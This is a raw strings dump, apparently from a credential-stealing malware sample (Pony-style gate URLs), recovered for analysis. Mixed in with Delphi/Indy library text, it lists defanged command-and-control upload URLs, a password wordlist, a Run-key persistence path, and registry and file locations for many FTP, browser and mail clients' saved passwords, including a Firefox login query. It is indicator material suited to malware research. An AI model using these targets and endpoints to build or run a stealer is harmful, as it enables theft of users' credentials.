ISO-8859-1-Windows-3.0-Latin-1

csWindows30Latin1

ISO-8859-1-Windows-3.1-Latin-1

csWindows31Latin1

ISO-8859-2-Windows-Latin-2

csWindows31Latin2

ISO-8859-9-Windows-Latin-5

csWindows31Latin5

csMicrosoftPublishing

Windows-31J

csWindows31J

PTCP154

csPTCP154

10.5.7

.nml=animation/narrative

.aac=audio/mp4

.aif=audio/x-aiff

.aifc=audio/x-aiff

.aiff=audio/x-aiff

.au=audio/basic

.gsm=audio/x-gsm

.kar=audio/midi

.m3u=audio/mpegurl

.mid=audio/midi

.midi=audio/midi

.mpega=audio/x-mpg

.mp2=audio/x-mpg

.mp3=audio/x-mpg

.mpga=audio/x-mpg

.m3u=audio/x-mpegurl

.pls=audio/x-scpls

.qcp=audio/vnd.qcelp

.ra=audio/x-realaudio

.ram=audio/x-pn-realaudio

.rm=audio/x-pn-realaudio

.sd2=audio/x-sd2

.sid=audio/prs.sid

.snd=audio/basic

.wav=audio/x-wav

.wax=audio/x-ms-wax

.wma=audio/x-ms-wma

.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile

.art=image/x-jg

.bmp=image/bmp

.cdr=image/x-coreldraw

.cdt=image/x-coreldrawtemplate

.cpt=image/x-corelphotopaint

.djv=image/vnd.djvu

.djvu=image/vnd.djvu

.gif=image/gif

.ief=image/ief

.ico=image/x-icon

.jng=image/x-jng

.jpg=image/jpeg

.jpeg=image/jpeg

.jpe=image/jpeg

.pat=image/x-coreldrawpattern

.pcx=image/pcx

.pbm=image/x-portable-bitmap

.pgm=image/x-portable-graymap

.pict=image/x-pict

.png=image/x-png

.pnm=image/x-portable-anymap

.pntg=image/x-macpaint

.ppm=image/x-portable-pixmap

.psd=image/x-psd

.qtif=image/x-quicktime

.ras=image/x-cmu-raster

.rf=image/vnd.rn-realflash

.rgb=image/x-rgb

.rp=image/vnd.rn-realpix

.sgi=image/x-sgi

.svg=image/svg-xml

.svgz=image/svg-xml

.targa=image/x-targa

.tif=image/x-tiff

.wbmp=image/vnd.wap.wbmp

.xbm=image/xbm

.xbm=image/x-xbitmap

.xpm=image/x-xpixmap

.xwd=image/x-xwindowdump

.xml=text/xml

.uls=text/iuls

.txt=text/plain

.rtx=text/richtext

.wsc=text/scriptlet

.rt=text/vnd.rn-realtext

.htt=text/webviewhtml

.htc=text/x-component

.vcf=text/x-vcard

.asf=video/x-ms-asf

.asx=video/x-ms-asf

.avi=video/x-msvideo

.dl=video/dl

.dv=video/dv

.flc=video/flc

.fli=video/fli

.gl=video/gl

.lsf=video/x-la-asf

.lsx=video/x-la-asf

.mng=video/x-mng

.mp2=video/mpeg

.mp3=video/mpeg

.mp4=video/mpeg

.mpeg=video/x-mpeg2a

.mpa=video/mpeg

.mpe=video/mpeg

.mpg=video/mpeg

.moov=video/quicktime

.mov=video/quicktime

.mxu=video/vnd.mpegurl

.qt=video/quicktime

.qtc=video/x-qtc

.rv=video/vnd.rn-realvideo

.ivf=video/x-ivf

.wm=video/x-ms-wm

.wmp=video/x-ms-wmp

.wmv=video/x-ms-wmv

.wmx=video/x-ms-wmx

.wvx=video/x-ms-wvx

.rms=video/vnd.rn-realvideo-secure

.asx=video/x-ms-asf-plugin

.movie=video/x-sgi-movie

.aab=application/x-authorware-bin

.aam=application/x-authorware-map

.aas=application/x-authorware-seg

.abw=application/x-abiword

.ace=application/x-ace-compressed

.ai=application/postscript

.alz=application/x-alz-compressed

.ani=application/x-navi-animation

.arj=application/x-arj

.asf=application/vnd.ms-asf

.bat=application/x-msdos-program

.bcpio=application/x-bcpio

.boz=application/x-bzip2

.bz=application/x-bzip

.bz2=application/x-bzip2

.cab=application/vnd.ms-cab-compressed

.cat=application/vnd.ms-pki.seccat

.ccn=application/x-cnc

.cco=application/x-cocoa

.cdf=application/x-cdf

.cer=application/x-x509-ca-cert

.chm=application/vnd.ms-htmlhelp

.chrt=application/vnd.kde.kchart

.cil=application/vnd.ms-artgalry

.class=application/java-vm

.com=application/x-msdos-program

.clp=application/x-msclip

.cpio=application/x-cpio

.cpt=application/mac-compactpro

.cqk=application/x-calquick

.crd=application/x-mscardfile

.crl=application/pkix-crl

.csh=application/x-csh

.dar=application/x-dar

.dbf=application/x-dbase

.dcr=application/x-director

.deb=application/x-debian-package

.dir=application/x-director

.dist=vnd.apple.installer xml

.distz=vnd.apple.installer xml

.dll=application/x-msdos-program

.dmg=application/x-apple-diskimage

.doc=application/msword

.dot=application/msword

.dvi=application/x-dvi

.dxr=application/x-director

.ebk=application/x-expandedbook

.eps=application/postscript

.evy=application/envoy

.exe=application/x-msdos-program

.fdf=application/vnd.fdf

.fif=application/fractals

.flm=application/vnd.kde.kivio

.fml=application/x-file-mirror-list

.gzip=application/x-gzip

.gnumeric=application/x-gnumeric

.gtar=application/x-gtar

.gz=application/x-gzip

.hdf=application/x-hdf

.hlp=application/winhlp

.hpf=application/x-icq-hpf

.hqx=application/mac-binhex40

.hta=application/hta

.ims=application/vnd.ms-ims

.ins=application/x-internet-signup

.iii=application/x-iphone

.iso=application/x-iso9660-image

.jar=application/java-archive

.karbon=application/vnd.kde.karbon

.kfo=application/vnd.kde.kformula

.kon=application/vnd.kde.kontour

.kpr=application/vnd.kde.kpresenter

.kpt=application/vnd.kde.kpresenter

.kwd=application/vnd.kde.kword

.kwt=application/vnd.kde.kword

.latex=application/x-latex

.lha=application/x-lzh

.lcc=application/fastman

.lrm=application/vnd.ms-lrm

.lz=application/x-lzip

.lzh=application/x-lzh

.lzma=application/x-lzma

.lzo=application/x-lzop

.lzx=application/x-lzx

.mpp=application/vnd.ms-project

.mvb=application/x-msmediaview

.man=application/x-troff-man

.mdb=application/x-msaccess

.me=application/x-troff-me

.ms=application/x-troff-ms

.msi=application/x-msi

.mpkg=vnd.apple.installer xml

.mny=application/x-msmoney

.nix=application/x-mix-transfer

.oda=application/oda

.odb=application/vnd.oasis.opendocument.database

.odc=application/vnd.oasis.opendocument.chart

.odf=application/vnd.oasis.opendocument.formula

.odg=application/vnd.oasis.opendocument.graphics

.odi=application/vnd.oasis.opendocument.image

.odm=application/vnd.oasis.opendocument.text-master

.odp=application/vnd.oasis.opendocument.presentation

.ods=application/vnd.oasis.opendocument.spreadsheet

.ogg=application/ogg

.odt=application/vnd.oasis.opendocument.text

.otg=application/vnd.oasis.opendocument.graphics-template

.oth=application/vnd.oasis.opendocument.text-web

.otp=application/vnd.oasis.opendocument.presentation-template

.ots=application/vnd.oasis.opendocument.spreadsheet-template

.ott=application/vnd.oasis.opendocument.text-template

.p7b=application/x-pkcs7-certificates

.p7r=application/x-pkcs7-certreqresp

.package=application/vnd.autopackage

.pfr=application/font-tdpfr

.pkg=vnd.apple.installer xml

.pdf=application/pdf

.pko=application/vnd.ms-pki.pko

.pl=application/x-perl

.pnq=application/x-icq-pnq

.pot=application/mspowerpoint

.pps=application/mspowerpoint

.ppt=application/mspowerpoint

.ppz=application/mspowerpoint

.ps=application/postscript

.pub=application/x-mspublisher

.qpw=application/x-quattropro

.qtl=application/x-quicktimeplayer

.rar=application/rar

.rdf=application/rdf xml

.rjs=application/vnd.rn-realsystem-rjs

.rm=application/vnd.rn-realmedia

.rmf=application/vnd.rmf

.rmp=application/vnd.rn-rn_music_package

.rmx=application/vnd.rn-realsystem-rmx

.rnx=application/vnd.rn-realplayer

.rpm=application/x-redhat-package-manager

.rsml=application/vnd.rn-rsml

.rtsp=application/x-rtsp

.rss=application/rss xml

.scm=application/x-icq-scm

.ser=application/java-serialized-object

.scd=application/x-msschedule

.sda=application/vnd.stardivision.draw

.sdc=application/vnd.stardivision.calc

.sdd=application/vnd.stardivision.impress

.sdp=application/x-sdp

.setpay=application/set-payment-initiation

.setreg=application/set-registration-initiation

.sh=application/x-sh

.shar=application/x-shar

.shw=application/presentations

.sit=application/x-stuffit

.sitx=application/x-stuffitx

.skd=application/x-koan

.skm=application/x-koan

.skp=application/x-koan

.skt=application/x-koan

.smf=application/vnd.stardivision.math

.smi=application/smil

.smil=application/smil

.spl=application/futuresplash

.ssm=application/streamingmedia

.sst=application/vnd.ms-pki.certstore

.stc=application/vnd.sun.xml.calc.template

.std=application/vnd.sun.xml.draw.template

.sti=application/vnd.sun.xml.impress.template

.stl=application/vnd.ms-pki.stl

.stw=application/vnd.sun.xml.writer.template

.svi=application/softvision

.sv4cpio=application/x-sv4cpio

.sv4crc=application/x-sv4crc

.swf=application/x-shockwave-flash

.swf1=application/x-shockwave-flash

.sxc=application/vnd.sun.xml.calc

.sxi=application/vnd.sun.xml.impress

.sxm=application/vnd.sun.xml.math

.sxw=application/vnd.sun.xml.writer

.sxg=application/vnd.sun.xml.writer.global

.tar=application/x-tar

.tcl=application/x-tcl

.tex=application/x-tex

.texi=application/x-texinfo

.texinfo=application/x-texinfo

.tbz=application/x-bzip-compressed-tar

.tbz2=application/x-bzip-compressed-tar

.tgz=application/x-compressed-tar

.tlz=application/x-lzma-compressed-tar

.tr=application/x-troff

.trm=application/x-msterminal

.troff=application/x-troff

.tsp=application/dsptype

.torrent=application/x-bittorrent

.ttz=application/t-time

.txz=application/x-xz-compressed-tar

.udeb=application/x-debian-package

.uin=application/x-icq

.urls=application/x-url-list

.ustar=application/x-ustar

.vcd=application/x-cdlink

.vor=application/vnd.stardivision.writer

.vsl=application/x-cnet-vsl

.wcm=application/vnd.ms-works

.wb1=application/x-quattropro

.wb2=application/x-quattropro

.wb3=application/x-quattropro

.wdb=application/vnd.ms-works

.wks=application/vnd.ms-works

.wmd=application/x-ms-wmd

.wms=application/x-ms-wms

.wmz=application/x-ms-wmz

.wp5=application/wordperfect5.1

.wpd=application/wordperfect

.wpl=application/vnd.ms-wpl

.wps=application/vnd.ms-works

.wri=application/x-mswrite

.xfdf=application/vnd.adobe.xfdf

.xls=application/x-msexcel

.xlb=application/x-msexcel

.xpi=application/x-xpinstall

.xps=application/vnd.ms-xpsdocument

.xsd=application/vnd.sun.xml.draw

.xul=application/vnd.mozilla.xul xml

.zoo=application/x-zoo

.zip=application/x-zip-compressed

.wml=text/vnd.wap.wml

.wmlc=application/vnd.wap.wmlc

.wmls=text/vnd.wap.wmlscript

.wmlsc=application/vnd.wap.wmlscriptc

.asm=text/x-asm

.pas=text/x-pascal

.cs=text/x-csharp

.cpp=text/x-c  src

.cxx=text/x-c  src

.cc=text/x-c  src

.hpp=text/x-c  hdr

.hxx=text/x-c  hdr

.hh=text/x-c  hdr

.java=text/x-java

.css=text/css

.js=text/javascript

.htm=text/html

.html=text/html

.ls=text/javascript

.mocha=text/javascript

.shtml=server-parsed-html

.sgm=text/sgml

.sgml=text/sgml

C:\Builds\TP\indysockets\lib\protocols\IdGlobalProtocols.pas

HTTP-EQUIV

()<>@,;:\"./

()<>@,;:\"/[]?=

()<>@,;:\"/[]?={}

TIdEncoder3to4.Encode: Calculated length exceeded (expected

C:\Builds\TP\indysockets\lib\protocols\IdCoder3to4.pas

TIdEncoder3to4.Encode: Calculated length not met (expected

X-HTTP-Method-Override

Mozilla/3.0 (compatible; Indy Library)

%d-%d

C:\Builds\TP\indysockets\lib\core\IdIOHandler.pas

255.255.255.255

0.0.0.0

C:\Builds\TP\indysockets\lib\core\IdIOHandlerStack.pas

0.0.0.1

C:\Builds\TP\indysockets\lib\core\IdThread.pas

C:\Builds\TP\indysockets\lib\core\IdScheduler.pas

C:\Builds\TP\indysockets\lib\protocols\IdZLibCompressorBase.pas

*<>#%"{}|\^[]`

*<>#%"{}|\^[]` 

HTTPS

.local

HttpOnly

C:\Builds\TP\indysockets\lib\protocols\IdCookie.pas

HTTPONLY

$Port

COMMENTURL

PORT

WINDOWS

C:\Builds\TP\indysockets\lib\protocols\IdHeaderCoderIndy.pas

()[]<>:;.,@\"

Content-Disposition: form-data; name="%s"

; filename="%s"

Content-Type: %s

; charset="%s"

Content-Transfer-Encoding: %s

libeay32.dll

ssleay32.dll

libssl32.dll

C:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSLHeaders.pas

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_PrivateKey

SSL_CTX_use_certificate

SSL_CTX_use_certificate_file

SSL_get_peer_certificate

SSL_CTX_set_default_passwd_cb

SSL_CTX_set_default_passwd_cb_userdata

SSL_CTX_check_private_key

X509_STORE_add_cert

X509_STORE_CTX_get_current_cert

i2d_DSAPrivateKey

d2i_DSAPrivateKey

d2i_PrivateKey

d2i_PrivateKey_bio

DES_set_key

_ossl_old_des_set_key

RSA_generate_key

RSA_check_key

RSA_generate_key_ex

i2d_PrivateKey_bio

i2d_RSAPrivateKey

d2i_RSAPrivateKey

i2d_RSAPublicKey

d2i_RSAPublicKey

i2d_PrivateKey

i2d_NETSCAPE_CERT_SEQUENCE

X509_get_default_cert_file

X509_get_default_cert_file_env

X509_set_pubkey

X509_REQ_set_pubkey

PEM_read_bio_RSAPrivateKey

PEM_read_bio_RSAPublicKey

PEM_read_bio_DSAPrivateKey

PEM_read_bio_PrivateKey

PEM_read_bio_NETSCAPE_CERT_SEQUENCE

PEM_write_bio_RSAPublicKey

PEM_write_bio_DSAPrivateKey

PEM_write_bio_PrivateKey

PEM_write_bio_NETSCAPE_CERT_SEQUENCE

PEM_write_bio_PKCS8PrivateKey

EVP_PKEY_type

EVP_PKEY_new

EVP_PKEY_free

EVP_PKEY_assign

C:\Builds\TP\indysockets\lib\protocols\IdSSLOpenSSL.pas

secur32.dll

security.dll

C:\Builds\TP\indysockets\lib\protocols\IdHTTP.pas

application/x-www-form-urlencoded

https

HTTP/1.0 200 OK

HTTP/

%s, ClassID: %s

olepro32.dll

%d - %s

C:\Builds\TP\vcl\OleServer.pas

login

passwd

ggg.txt

hXXps://people.live.com

hXXps://people.live.com/export?canary=

hXXp://91.108.68.202/up.php

hXXps://mail.google.com/mail/u/0/h/1ueaawj88elpf/?&v=cl&pnl=a

Passwd

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

firefox

firefox.exe

iexplore.exe

chrome

chrome.exe

VVV.hotmail.com

hXXp://VVV.gmail.com

hXXps://login.globo.com/login/1948

hXXps://login.globo.com/login/1

Kernel32.dll

Open SSL Support DLL Delphi and C  Builder interface

hXXp://VVV.indyproject.org/

1993 - 2009

JPEG error #%d

Unsupported operation./Could not encode header data using charset "%s"

OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

DCOM not installed"'%s' is not a valid property value

OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s&Cannot change the size of a JPEG image

SSL status: "%s"

%s Alert

%s Read Alert

%s Write Alert

Handshake DonepUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.

Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported$Error accepting connection with SSL.

Error creating SSL context. Could not load root certificate.

Could not load certificate.#Could not load key, check password.

Mode has not been set.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.

Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly

No credential handle acquiredBCan not change credentials after handle aquired. Use Release first4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.

KUnsupported hash algorithm. This implementation supports only MD5 encoding.

The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client

The logon attempt failed;The credentials supplied to the package were not recognized UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.

Reply Code is not valid: %s

Reply Code already exists: %s

IOHandler value is not valid'Algorithm %s not permitted in FIPS mode

Unknown Protocol(Request method requires HTTP version 1.1

File "%s" not found

Object type not supported.

Transparent proxy cannot bind.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.

Command not supported.

Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)

Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.

Invalid Port Range (%d - %d)

%s is not a valid service.

%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.

End of stream: Class %s at %d)UDP is not support in this SOCKS version.

Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.

Socket operation on non-socket.

Protocol not supported.

Socket type not supported."Operation not supported on socket.

Protocol family not supported.0Address family not supported by protocol family.

Resolving hostname %s.

Connecting to %s.

Socket Error # %d

Operation would block.

Operation now in progress.

Operation already in progress.

Invalid clipboard format Clipboard does not support Icons

Cannot open clipboard: %s

Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form

- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)

Grid too large for operation Too many rows or columns deleted

Invalid input value7Invalid input value. Use escape key to abandon changes

%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent

Invalid operation on TOleGraphic$Unknown picture file extension (.%s)

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'

No help found for context %d

No help found for %s

Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image

Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread9Cannot call SetReturnValue on an externally create thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and <= %drHigh surrogate char without a following low surrogate char at index: %d. Check that the string is encoded properlyrLow surrogate char without a preceding high surrogate char at index: %d. Check that the string is encoded properly2Length of Strings and Objects arrays must be equal

Invalid Timeout value: %s#''%s'' is not a valid integer value

List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class

Error reading %s%s%s: %s

Failed to create key %s

Failed to get data for '%s'

Failed to set data for '%s'

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Thread creation error: %s

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Invalid file name - %s

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

Invalid destination array"Character index out of bounds (%d)

Start index out of bounds (%d)

Invalid count (%d)

Invalid destination index (%d)

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

External exception %x

Interface not supported

Object lock not owned(Monitor support function not initialized

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation

Invalid NULL variant operation%Invalid variant operation (%s%.8x)

%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

'%d.%d' is not a valid timestamp

I/O error %d

Integer overflow Invalid floating point operation

p.exe_1536:

.text

`.data

password

12345678

password1

monkey

1234567

123456789

7777777

asshole

mickey

passw0rd

smokey

hockey

11111111

windows

1234567890

hXXp://bigbone10.info/pony/gate.php

hXXp://bigbone10.info:8080/pony/gate.php

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

kernel32.dll

netapi32.dll

ole32.dll

advapi32.dll

CryptGetUserKey

CryptExportKey

CryptDestroyKey

crypt32.dll

CertOpenSystemStoreA

CertEnumCertificatesInStore

CertCloseStore

CryptAcquireCertificatePrivateKey

msi.dll

pstorec.dll

^shell32.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

explorer.exe

POST %s HTTP/1.0

Host: %s

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

{X-X-X-XX-XXXXXX}

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Password

wcx_PTF.ini

FtpIniName

Software\Ghisler\Windows Commander

\Ipswitch\WS_FTP

\win.ini

WS_FTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\sm.dat

\Sites.dat

\Quick.dat

\History.dat

\sitemanager.xml

\recentservers.xml

\filezilla.xml

Port

Server.Host

Server.User

Server.Pass

Server.Port

Last Server Pass

Last Server Port

FTP Navigator

FTP Commander

ftplist.txt

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

\SmartFTP

Favorites.dat

History.dat

addrbk.dat

quick.dat

\TurboFTP

Software\TurboFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

profiles.xml

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

PasswordType

Login

FtpSite.xml

\sites.xml

\FTPRush

RushSite.xml

FtpPort

Software\Cryer\WebSitePublisher

bitkinex.ds

\drives.js

"password" : "

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

FtpServer

FtpUserName

FtpPassword

_FtpPassword

FtpDirectory

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

ftplast.osd

\SharedSettings.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings.sqlite

\SharedSettings_1_0_5.sqlite

leapftp

unleap.exe

sites.dat

sites.ini

\LeapWare\LeapFTP

PortNumber

\32BitFtp.ini

NDSites.ini

PassWord

Software\South River Technologies\WebDrive\Connections

FTP CONTROL

FTPCON

hXXp://

hXXps://

PTF://

opera

wand.dat

_Software\Opera Software

Opera.HTML\shell\open\command

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

wiseftpsrvs.ini

wisePTF.ini

FTPVoyager.ftp

FTPVoyager.qc

\RhinoSoft.com

nss3.dll

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3_open

sqlite3_close

sqlite3_prepare

sqlite3_step

sqlite3_column_bytes

sqlite3_column_blob

mozsqlite3.dll

profiles.ini

PathToExe

prefs.js

signons.sqlite

signons.txt

signons2.txt

signons3.txt

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

Firefox

\Mozilla\Firefox\

Software\Mozilla

fireFTPsites.dat

SeaMonkey

\Mozilla\SeaMonkey\

Mozilla

\Mozilla\Profiles\

Software\LeechFTP

bookmark.dat

SiteInfo.QFP

WinFTP

sites.db

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

servers.xml

\FTPGetter

ESTdb2.dat

QData.dat

\Estsoft\ALFTP

MS IE FTP Passwords

SiteServer %d\Host

SiteServer %d\WebUrl

SiteServer %d\Remote Directory

SiteServer %d-User

SiteServer %d-User PW

%s\Keychain

SiteServer %d\SFTP

DeluxeFTP

sites.xml

Web Data

Login Data

SQLite format 3

logins

origin_url

password_value

\Google\Chrome

\ChromePlus

Software\ChromePlus

\Nichrome

Staff-FTP

SM.arch

FreshFTP

BlazeFtp

site.dat

LastPassword

LastPort

Software\FlashPeak\BlazeFtp\Settings

\BlazeFtp

FTP  .Link\shell\open\command

GoFTP

Connections.txt

3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

password 51:b:

FTP Now

FTPNow

SOFTWARE\Robo-FTP 3.7\Scripts

SOFTWARE\Robo-FTP 3.7\FTPServers

FTP Count

FTP File%d

2.5.29.37

Software\LinasFTP\Site Manager

.duck

user.config

NppFTP.xml

FTP destination server

FTP destination user

FTP destination password

FTP destination port

FTP destination catalog

FTP profiles

FTPShell

ftpshell.fsi

Software\MAS-Soft\FTPInfo\Setup

\FTPInfo

ServerList.xml

ftpsite.ini

FTPList.db

\MapleStudio\ChromePlus

Software\Nico Mak Computing\WinZip\FTP

My FTP

project.ini

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

NovaFTP.db

\INSoftware\NovaFTP

.oeaccount

<POP3_Password2

<SMTP_Password2

<IMAP_Password2

<HTTPMail_Password2

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

Mailbox.ini

\PocoSystem.ini

accounts.ini

PopPort

PopPassword

SmtpServer

SmtpPort

SmtpAccount

SmtpPassword

account.cfg

account.cfn

Dir #%d

SMTP Email Address

SMTP Server

SMTP User Name

HTTP User

HTTP Server URL

HTTPMail User Name

HTTPMail Server

SMTP User

POP3 Port

SMTP Port

IMAP Port

POP3 Password2

IMAP Password2

NNTP Password2

HTTPMail Password2

SMTP Password2

POP3 Password

IMAP Password

NNTP Password

HTTP Password

SMTP Password

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

inetcomm server passwords

outlook account manager passwords

STATUS-IMPORT-OK

%d.bat

ShellExecuteA

shell32.dll

;3 #>6.&

'2, / 0&7!4-)1#

GetWindowsDirectoryA

user32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyA

RegEnumKeyExA

RegCreateKeyA

InternetCrackUrlA

InternetCreateUrlA

wininet.dll

shlwapi.dll

wsock32.dll

userenv.dll

2hXXp://VVV.facebook.com/

xthpt/:w/wwf.cabeoo.koc/m

p.exe_1536_rwx_00400000_00016000:

.text

`.data

password

12345678

password1

monkey

1234567

123456789

7777777

asshole

mickey

passw0rd

smokey

hockey

11111111

windows

1234567890

hXXp://bigbone10.info/pony/gate.php

hXXp://bigbone10.info:8080/pony/gate.php

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

kernel32.dll

netapi32.dll

ole32.dll

advapi32.dll

CryptGetUserKey

CryptExportKey

CryptDestroyKey

crypt32.dll

CertOpenSystemStoreA

CertEnumCertificatesInStore

CertCloseStore

CryptAcquireCertificatePrivateKey

msi.dll

pstorec.dll

^shell32.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

explorer.exe

POST %s HTTP/1.0

Host: %s

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

{X-X-X-XX-XXXXXX}

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Password

wcx_PTF.ini

FtpIniName

Software\Ghisler\Windows Commander

\Ipswitch\WS_FTP

\win.ini

WS_FTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\sm.dat

\Sites.dat

\Quick.dat

\History.dat

\sitemanager.xml

\recentservers.xml

\filezilla.xml

Port

Server.Host

Server.User

Server.Pass

Server.Port

Last Server Pass

Last Server Port

FTP Navigator

FTP Commander

ftplist.txt

